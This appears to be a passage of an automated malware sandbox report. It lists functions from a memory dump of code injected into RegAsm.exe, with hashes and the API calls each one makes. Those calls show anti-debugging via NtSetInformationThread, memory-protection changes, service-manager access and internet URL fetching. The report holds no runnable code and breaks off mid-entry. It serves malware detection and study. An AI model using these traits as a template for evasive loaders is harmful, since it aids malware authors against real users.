Opcode ID: bc8e02aa95ab557f841e5375759377ef2b199ecbbce06f3ecff90ae0eb69b6fe
Instruction ID: ac64e830187ea4c3fceddcfa4e52e89a914e5c52c47a00ec6a7c39837f632ba7
Opcode Fuzzy Hash: bc8e02aa95ab557f841e5375759377ef2b199ecbbce06f3ecff90ae0eb69b6fe
Instruction Fuzzy Hash: 48E14AB1700706EFEB359E28CD90BE6B3A5FF15358F144239EC9A93641D738A854CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01370CFF, Relevance: 1.9, APIs: 1, Instructions: 368nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 4677a3bfbe5abb6e4819fc1e684829d649f68b6dff6e4fa3295515660c6657fe
Instruction ID: 13ffcff4cb32d650015635c81617dc59cf53ed848eae52065198ee446aa43200
Opcode Fuzzy Hash: 4677a3bfbe5abb6e4819fc1e684829d649f68b6dff6e4fa3295515660c6657fe
Instruction Fuzzy Hash: 49A1DDA160430FA6FF35266C8DB97FE265ECF433ACF644129ED83A7895C76CC4828112

Uniqueness

Uniqueness Score: -1.00%

Function 01377E0C, Relevance: 1.8, APIs: 1, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7ace82f40a10615e097b171d8a0f587214cce37e723cd361930cac34ead7515d
Instruction ID: e7497a42efad3d0df47e97d562e9c961b429b10c2bad00c5e243c3f7cea5fef3
Opcode Fuzzy Hash: 7ace82f40a10615e097b171d8a0f587214cce37e723cd361930cac34ead7515d
Instruction Fuzzy Hash: 1CB15A64A08346CEEF31CF2CC598769BA95AF1632CF4482EDD9968B6D7C37C8042C712

Uniqueness

Uniqueness Score: -1.00%

Function 0137846D, Relevance: 1.7, APIs: 1, Instructions: 243nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01377E9D,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 01378466

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a511f93b35c793899b263105e4a73af4e56aecc281b1a1410febf7b31613b247
Instruction ID: 462f088e11998644f538a65e4a60a7458a14d9f268a0d462a3ce0de7e7ef7133
Opcode Fuzzy Hash: a511f93b35c793899b263105e4a73af4e56aecc281b1a1410febf7b31613b247
Instruction Fuzzy Hash: 49517CA151D2849FE71ADB2CCC8DF763BADDB57228F0901DEE082D70A3D558A806C322

Uniqueness

Uniqueness Score: -1.00%

Function 0137849A, Relevance: 1.7, APIs: 1, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91efc1d3fef0ed7c46d567b533f1b73eb98a5e7640503c10292194c9996ed4a4
Instruction ID: d2584b7f771adeb998b871fe74eb83b500abb7ec7fb37c38cdba2273979b8c96
Opcode Fuzzy Hash: 91efc1d3fef0ed7c46d567b533f1b73eb98a5e7640503c10292194c9996ed4a4
Instruction Fuzzy Hash: BC415CB121E2C49FF716EB2CCC89E723BE9DB57229F0904CEE082C71A3C558A801C721

Uniqueness

Uniqueness Score: -1.00%

Function 01371DBB, Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb68e52accbac1283f36afcb6ee4fedf9e1f64065e0fe6fca98513f9b160e0a
Instruction ID: e6bbdc08cc6b60893d47b2a0ce8e48fcc74addead26574234edd0c679258fa47
Opcode Fuzzy Hash: bbb68e52accbac1283f36afcb6ee4fedf9e1f64065e0fe6fca98513f9b160e0a
Instruction Fuzzy Hash: A531ABF2208B1ABAFA3119688D32BFB225E9F517ACF504529FD47B38C4C3AD88448152

Uniqueness

Uniqueness Score: -1.00%

Function 01370AC7, Relevance: 1.6, APIs: 1, Instructions: 86nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000), ref: 01370AA5

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 4eedfb92dcd44b2b7222527fc355fd6c27c48e673bc9c3b68c8b8f87dc0b42c1
Instruction ID: 110bef5c1645b36b339cc797cc5155b4ecd68cda40a4f235e717d1fe1ccd40a3
Opcode Fuzzy Hash: 4eedfb92dcd44b2b7222527fc355fd6c27c48e673bc9c3b68c8b8f87dc0b42c1
Instruction Fuzzy Hash: 9121977460A30AABFF34BE6C8991BE63B659F0329CF440654FC42A3586C32CE84AC741

Uniqueness

Uniqueness Score: -1.00%

Function 0137844B, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01377E9D,00000040,01370A1D,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 01378466

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a082ce208c2f132c7b6e50e98319d7b26e10bbd825a5419c11cba5b320e60bdc
Instruction ID: c546c4077c87792ccf82bb952680dd026a467b548c7537b61ca5d6b35e6428e5
Opcode Fuzzy Hash: a082ce208c2f132c7b6e50e98319d7b26e10bbd825a5419c11cba5b320e60bdc
Instruction Fuzzy Hash: 0AC012E52250002E69048A28CD88D6BB7AA8AD5A28B14C32CB872222CCCA30EC088032

Uniqueness

Uniqueness Score: -1.00%

Function 01370B8E, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84e003fced31ade32b54db09c8bbafee067895e0fb973e35a36d10d7a8d94f1
Instruction ID: 8d1b1c45767898497305bf5d92c95b37fb74e21ff0bc09ce35f3688754739d1d
Opcode Fuzzy Hash: c84e003fced31ade32b54db09c8bbafee067895e0fb973e35a36d10d7a8d94f1
Instruction Fuzzy Hash: DCB1F07160430BA7FF352A6C8DA47FE3B5ADF433ACF544529EC8297996C76CC4868211

Uniqueness

Uniqueness Score: -1.00%

Function 01370C23, Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3678227003838e4058cd39c1de09b9d9d9234d6a3ad1d690c9663c2ea98fd2
Instruction ID: 09ab059be93771762c2022ba8b3b89bce001dce83fe7c7a431549997c2a5d31e
Opcode Fuzzy Hash: fb3678227003838e4058cd39c1de09b9d9d9234d6a3ad1d690c9663c2ea98fd2
Instruction Fuzzy Hash: CAA1037160430B9AFF362A6C8DA47FE365ADF4336CF644225EC82DB995C77CC4828212

Uniqueness

Uniqueness Score: -1.00%

Function 01370D04, Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3eb042ade8c4dad5db8c0cfee1dccda6faa4f1a4bcdec9d3649cdb1c120775c
Instruction ID: 368d2141a87da1aca8568d294000ead6dd7b717f94f2483730bd815cc6134083
Opcode Fuzzy Hash: b3eb042ade8c4dad5db8c0cfee1dccda6faa4f1a4bcdec9d3649cdb1c120775c
Instruction Fuzzy Hash: 4191F37160430B96FF35266C8DA97FE3A5ADF433ACF640129ED83D7896C76CC4828612

Uniqueness

Uniqueness Score: -1.00%

Function 01370CBA, Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ac0af3ba0a07e18c371e32571aa388fa85bff8c644dd56b5282a73d95f8d83
Instruction ID: 43ac5f30e33be39947e460c944b32071addbf4ac4cb294cf6b765452e2830cc5
Opcode Fuzzy Hash: 68ac0af3ba0a07e18c371e32571aa388fa85bff8c644dd56b5282a73d95f8d83
Instruction Fuzzy Hash: 4C81037160430B96FF35266C8DA97FE3A5ACF433ACF644529EC83978D6D76CC4828212

Uniqueness

Uniqueness Score: -1.00%

Function 01374B36, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0={,
API String ID: 0-63937952
Opcode ID: e12d5110d680b87514ffbd5afad315c69dd9a9c4aa384c81390d1aa0ca9cd4e8
Instruction ID: 1fb2b5f154732a4b2321fb00e6ccf3047a7d8df05644fa8f96deabfca25e1c3b
Opcode Fuzzy Hash: e12d5110d680b87514ffbd5afad315c69dd9a9c4aa384c81390d1aa0ca9cd4e8
Instruction Fuzzy Hash: 62F165B030030AAFEF319F68CC91BEA3BA6BF59398F504119ED459B280D77C9881DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01378A56, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Strings

aH$, xrefs: 01378A28

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: aH$
API String ID: 1889721586-933212851
Opcode ID: 8971a50eb7a68629c532164865fea72f985878b2204cff5997481e247012fbab
Instruction ID: dccf9a003daa98748f5714784d0615066986ad90c06fa8a14833fb53f61d4095
Opcode Fuzzy Hash: 8971a50eb7a68629c532164865fea72f985878b2204cff5997481e247012fbab
Instruction Fuzzy Hash: C061142060E249EFFB72FB2CC44CBB57BA6AB5721CF450DDAD44297D12C328A485CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01374BA6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0={,
API String ID: 0-63937952
Opcode ID: f94b566f6ea4327d642f72ea0bef979aa1939160c5b2546a7fa61f68bf6459f7
Instruction ID: 22eb02e979bdb876965bf6d62106a97aa390bfe113ee209199b62979faded54e
Opcode Fuzzy Hash: f94b566f6ea4327d642f72ea0bef979aa1939160c5b2546a7fa61f68bf6459f7
Instruction Fuzzy Hash: 1C6118B070534B8FDB71EFA9C4A1BDA3BA2AFAA254F108419DC4587711DB34E812CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01374B44, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 0={,
API String ID: 2994545307-63937952
Opcode ID: 6a97f559547c989fe6128f6b089fcb13f33f2bd32f733c7884399877413929c9
Instruction ID: 8efc73f529dcc8b8cb4db5e9a4f2e94e0fec53532459e023b1870ffa2b671366
Opcode Fuzzy Hash: 6a97f559547c989fe6128f6b089fcb13f33f2bd32f733c7884399877413929c9
Instruction Fuzzy Hash: FC51C6B070070F8BDB71EFA984A17DA3BA2AFA9254F608119DC0687754EB39D812CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01374C03, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0={,
API String ID: 0-63937952
Opcode ID: 40872e618e6168be94339e3685da9817d2e891ad5a08b8f809b0966c3bb1a23f
Instruction ID: 132315fc4319a3acbdd9e138d3590d173ad30f5469896a2ebbb97e99f2bad85e
Opcode Fuzzy Hash: 40872e618e6168be94339e3685da9817d2e891ad5a08b8f809b0966c3bb1a23f
Instruction Fuzzy Hash: E651F7B070534B8FDB71EF6984A1BDA3BA2AFAA294F108019DC4687715DB34D812CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01374C9A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0={,
API String ID: 0-63937952
Opcode ID: ecff225fbd5bf90e1fe16666e8a1969a9b302c7c6d12f0ae7da4ab61f218033f
Instruction ID: 0e26082fca319a55c3559568e6082bc6f2cf8cc34cc73536dd2284b38adcafe1
Opcode Fuzzy Hash: ecff225fbd5bf90e1fe16666e8a1969a9b302c7c6d12f0ae7da4ab61f218033f
Instruction Fuzzy Hash: 775108B070534B9FDB31EFA985A17DA3BE6AFAA294F104409DC0687715DB34E812CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01374BCD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 0={,
API String ID: 2994545307-63937952
Opcode ID: 33f20b758ba5b141cab1b73a219783bb0f8c3be5d290bf83e90cbeb821dd9280
Instruction ID: 156118477b61ff397ee31b2f7fadcac992cd3670fdeef0c8094169dc1a4c9f60
Opcode Fuzzy Hash: 33f20b758ba5b141cab1b73a219783bb0f8c3be5d290bf83e90cbeb821dd9280
Instruction Fuzzy Hash: 7051C7B070470F8BDB75EFA984A17DA3BA2AFA9254F208019DC0687714EB38D852CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01374C62, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

0={,, xrefs: 01374C4F

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0={,
API String ID: 0-63937952
Opcode ID: ab94b3dcf9e88b28e9b75e9f93e3f495d1204a9160351931dd74dd1622578bb8
Instruction ID: ee1e2495911fb180a7e59eb984cfa5c13f6aae349767abaa3ee6af2055c257f7
Opcode Fuzzy Hash: ab94b3dcf9e88b28e9b75e9f93e3f495d1204a9160351931dd74dd1622578bb8
Instruction Fuzzy Hash: 5141E7B070534B8FDB71EFA984A17DA3BA2BFA9294F208419DC4687715DB34E812CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01374F9E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 013747CE: InternetOpenA.WININET(01374FD3,00000000,00000000,00000000,00000000,01371D72,?,00000000,?,00000050,00000315,?,?,?,?), ref: 013747DF
Part of subcall function 013747CE: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Strings

rX4, xrefs: 01374F57

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID: rX4
API String ID: 518753361-805084833
Opcode ID: 50f636f026437e1fb6f6cb492dae995a1733dd66b85b38b1d6d1802fecbcc13d
Instruction ID: eea3d8ac17481091547063ca606206737d35bb28a18bf61c4a62b5ee5b6671bf
Opcode Fuzzy Hash: 50f636f026437e1fb6f6cb492dae995a1733dd66b85b38b1d6d1802fecbcc13d
Instruction Fuzzy Hash: E041233020E3C59FEB23EF7C85549967FE1AB07218B14488DD0829B413C329B805D746

Uniqueness

Uniqueness Score: -1.00%

Function 013788DE, Relevance: 3.2, APIs: 2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33fcff2bc506c8073170baeb1ab55760110036fe1cdbb7a425f6695c6fd88103
Instruction ID: 409deb2697ca6d1c47853f11d4a3e03e483bd5e5b6fd6029847c6528c31bee42
Opcode Fuzzy Hash: 33fcff2bc506c8073170baeb1ab55760110036fe1cdbb7a425f6695c6fd88103
Instruction Fuzzy Hash: E05148A060C60ECEFF366A28C56D7B9626AAF5136CF5409EBD90792C51C36C84C4C653

Uniqueness

Uniqueness Score: -1.00%

Function 013747CE, Relevance: 3.1, APIs: 2, Instructions: 109networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(01374FD3,00000000,00000000,00000000,00000000,01371D72,?,00000000,?,00000050,00000315,?,?,?,?), ref: 013747DF
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: b1db422d9a1ead5d530f91c9f4f65998ea64090ad4fcc0c1cc22dca69e03e00e
Instruction ID: 6d8a3671689107a278af31d6acb710c4a17f41d059fdcbbd19867217604e9b46
Opcode Fuzzy Hash: b1db422d9a1ead5d530f91c9f4f65998ea64090ad4fcc0c1cc22dca69e03e00e
Instruction Fuzzy Hash: EC41CD3024438FFBEF309E14CD55FFE3699AF54748F004025ED4A6A890E775AA40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 0137480D, Relevance: 3.1, APIs: 2, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(01374FD3,00000000,00000000,00000000,00000000,01371D72,?,00000000,?,00000050,00000315,?,?,?,?), ref: 013747DF
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c915ddefeb1e49201ed4b395594e6eb57ff8e77e574a0d66d0c3e8eb64936ae0
Instruction ID: f684a56c4773880244119c534c2e86f063d38ff7ca6b9e106b81b37de7583ab4
Opcode Fuzzy Hash: c915ddefeb1e49201ed4b395594e6eb57ff8e77e574a0d66d0c3e8eb64936ae0
Instruction Fuzzy Hash: 1631EC702483CAEFEB319F64DC50BFA3BA89F02648F044455ED4ADB892D739A945DB21

Uniqueness

Uniqueness Score: -1.00%

Function 01378496, Relevance: 1.8, APIs: 1, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8badb830dad81e3ceda98a4b8bf698417e23679da62f693b8fc51fa8db138b
Instruction ID: ac0d4b195f7d139fbaf04fee507918aa853f8c37f5112114e26f67b870d73c15
Opcode Fuzzy Hash: 0a8badb830dad81e3ceda98a4b8bf698417e23679da62f693b8fc51fa8db138b
Instruction Fuzzy Hash: 91514AE110DA899FF72A9728CCAAB763BADDB1722CF0800DFE587C7593D55C58058722

Uniqueness

Uniqueness Score: -1.00%

Function 013762AE, Relevance: 1.7, APIs: 1, Instructions: 194libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6aaf5a2b215f9b09fafc2f80e80d5a65fead1ebfe4b560749397b579408c4113
Instruction ID: 299d90cc2e215a95e0f918e013eb22aa7cff14d2740d4ca11bf6ff88ed86ce99
Opcode Fuzzy Hash: 6aaf5a2b215f9b09fafc2f80e80d5a65fead1ebfe4b560749397b579408c4113
Instruction Fuzzy Hash: F451E3A020EA84EBFB73FB6D9962DF93BD59B0355CB440C98E882D3813C359E414DB11

Uniqueness

Uniqueness Score: -1.00%

Function 0137898F, Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: d412adad46908b27f42f4a3b9e049ce0e53bf45e03803845f7e2059a9b610433
Instruction ID: cb6ab28e363cf14e9d3230e2f9985b1ae8592da70f6be50715c6fdd7797178f2
Opcode Fuzzy Hash: d412adad46908b27f42f4a3b9e049ce0e53bf45e03803845f7e2059a9b610433
Instruction Fuzzy Hash: A351FF2020E24ADFFF72AA6CC48CBB87B96AB1321CF550CD6D446A7D52C32DA485C753

Uniqueness

Uniqueness Score: -1.00%

Function 01378C02, Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 834a3b5314129e4b949d74358bc11fda9a15006dded4cb878c99ea8da9eb41d7
Instruction ID: bdeb7ebf25469a6071171fe4677e1fa9e3d306e4d35370d6c47fb54fa3bb9263
Opcode Fuzzy Hash: 834a3b5314129e4b949d74358bc11fda9a15006dded4cb878c99ea8da9eb41d7
Instruction Fuzzy Hash: 7851CE6060E285EFFF72EB6CC548EB5BBE5AB1321CF450CC5E48697913C329A4848B52

Uniqueness

Uniqueness Score: -1.00%

Function 0137630A, Relevance: 1.7, APIs: 1, Instructions: 166libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 11bc4938270ceb18945bf9e08a8f6fa053d2afe3bbcab0ef84fb2cfeb81d4f4f
Instruction ID: 27a8169a18acd16c125ecd8d2b5dace7201cf5e494d224c393efa5cdf32854fd
Opcode Fuzzy Hash: 11bc4938270ceb18945bf9e08a8f6fa053d2afe3bbcab0ef84fb2cfeb81d4f4f
Instruction Fuzzy Hash: 3151F4A020E785ABFB33FFBD8562DE53BD69A03558F450C98E892D7823C359B405DB06

Uniqueness

Uniqueness Score: -1.00%

Function 0137892F, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4417f6ae5a3934d3eb9442280facd84d0500892c1d9b7616933321fb8af43b68
Instruction ID: c5d1310bed433cbcacfdff1c5b86e7b07bbefba16f8e1cf6131c06fdce0bd8e1
Opcode Fuzzy Hash: 4417f6ae5a3934d3eb9442280facd84d0500892c1d9b7616933321fb8af43b68
Instruction Fuzzy Hash: 4151DC2060D24ADEFF76AA6CC49CBB87BA6AB5331CF5908D6C44697C52C32C9885C753

Uniqueness

Uniqueness Score: -1.00%

Function 0137895E, Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f437ac1bd6c6be6b273fe43e033a3eb71034578cad9d31fab26e8f3c8b8fdd57
Instruction ID: a60f890e79a66a6b7132ce085251cac48f76bd4881f400f4b8f91e51c347f2c9
Opcode Fuzzy Hash: f437ac1bd6c6be6b273fe43e033a3eb71034578cad9d31fab26e8f3c8b8fdd57
